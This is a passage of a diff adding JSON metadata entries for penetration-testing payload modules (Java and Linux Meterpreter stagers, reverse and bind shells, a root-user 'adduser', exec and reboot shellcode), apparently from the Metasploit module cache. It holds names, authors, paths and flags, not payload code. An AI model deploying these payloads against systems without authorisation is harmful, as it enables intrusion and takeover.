meterpreter server in Java.\n\nTunnel communication over HTTP", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/reverse_http.rb", + "is_install_path": true, + "ref_name": "java/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/meterpreter", + "stager_refname": "java/reverse_http" + }, + "payload_java/meterpreter/reverse_https": { + "name": "Java Meterpreter, Java Reverse HTTPS Stager", + "fullname": "payload/java/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves", + "hdm " + ], + "description": "Run a meterpreter server in Java.\n\nTunnel communication over HTTPS", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/reverse_https.rb", + "is_install_path": true, + "ref_name": "java/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/meterpreter", + "stager_refname": "java/reverse_https" + }, + "payload_java/meterpreter/reverse_tcp": { + "name": "Java Meterpreter, Java Reverse TCP Stager", + "fullname": "payload/java/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in Java.\n\nConnect 
back stager", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "java/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/meterpreter", + "stager_refname": "java/reverse_tcp" + }, + "payload_java/shell/bind_tcp": { + "name": "Command Shell, Java Bind TCP Stager", + "fullname": "payload/java/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt " + ], + "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nListen for a connection", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/bind_tcp.rb", + "is_install_path": true, + "ref_name": "java/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/shell", + "stager_refname": "java/bind_tcp" + }, + "payload_java/shell/reverse_tcp": { + "name": "Command Shell, Java Reverse TCP Stager", + "fullname": "payload/java/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt " + ], + "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nConnect back stager", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "java/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/shell", + "stager_refname": "java/reverse_tcp" + }, + "payload_java/shell_reverse_tcp": { + "name": "Java Command Shell, Reverse TCP Inline", + "fullname": "payload/java/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/java/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "java/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/aarch64/meterpreter/reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Stager", + "fullname": "payload/linux/aarch64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack " + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb", + 
"is_install_path": true, + "ref_name": "linux/aarch64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/aarch64/meterpreter", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_linux/aarch64/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/aarch64/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb", + "is_install_path": 
true, + "ref_name": "linux/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/aarch64/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/aarch64/shell/reverse_tcp": { + "name": "Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/aarch64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "dup2 socket in x12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/aarch64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 
false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/aarch64/shell", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_linux/aarch64/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armbe/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/armbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/armbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armbe/meterpreter_reverse_https": { + "name": "Linux 
Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/armbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/armbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armbe/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/armbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armbe/shell_bind_tcp": { + "name": "Linux ARM Big Endian Command Shell, Bind TCP Inline", + "fullname": "payload/linux/armbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": 
null, + "type": "payload", + "author": [ + "Balazs Bucsay @xoreipeip " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" + ], + "platform": "Linux", + "arch": "armbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/adduser": { + "name": "Linux Add User", + "fullname": "payload/linux/armle/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Jonathan Salwan" + ], + "description": "Create a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/adduser.rb", + "is_install_path": true, + "ref_name": "linux/armle/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/armle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Jonathan Salwan" + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": 
"2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/exec.rb", + "is_install_path": true, + "ref_name": "linux/armle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/meterpreter/bind_tcp": { + "name": "Linux Meterpreter, Bind TCP Stager", + "fullname": "payload/linux/armle/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "nemo " + ], + "description": "Inject the mettle server payload (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_linux/armle/meterpreter/reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Stager", + "fullname": "payload/linux/armle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "nemo ", + "tkmru" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb", + "is_install_path": 
true, + "ref_name": "linux/armle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_linux/armle/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/armle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/armle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/armle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": 
"linux/armle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/armle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/shell/bind_tcp": { + "name": "Linux dup2 Command Shell, Bind TCP Stager", + "fullname": "payload/linux/armle/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo " + ], + "description": "dup2 socket in r12, then execve.\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + 
"stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_linux/armle/shell/reverse_tcp": { + "name": "Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/armle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo ", + "tkmru" + ], + "description": "dup2 socket in r12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_linux/armle/shell_bind_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/armle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "civ", + "hal" + ], + "description": "Connect to target and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP 
Inline", + "fullname": "payload/linux/armle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "civ" + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mips64/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/mips64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mips64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/mips64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mips64/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/mips64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent 
Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mips64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/mips64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mips64/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/mips64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mips64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mips64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/mipsbe/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Michael Messner ", + "entropy " + ], + "description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", + "references": [ + "EDB-17940" + ], + "platform": 
"Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/exec.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/meterpreter/reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Stager", + "fullname": "payload/linux/mipsbe/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/mipsbe/meterpreter", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_linux/mipsbe/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/mipsbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, 
+ "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/mipsbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/mipsbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": 
"/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/reboot": { + "name": "Linux Reboot", + "fullname": "payload/linux/mipsbe/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Michael Messner ", + "rigan - " + ], + "description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/reboot.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/shell/reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/mipsbe/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "juan vazquez ", + "tkmru" + ], + 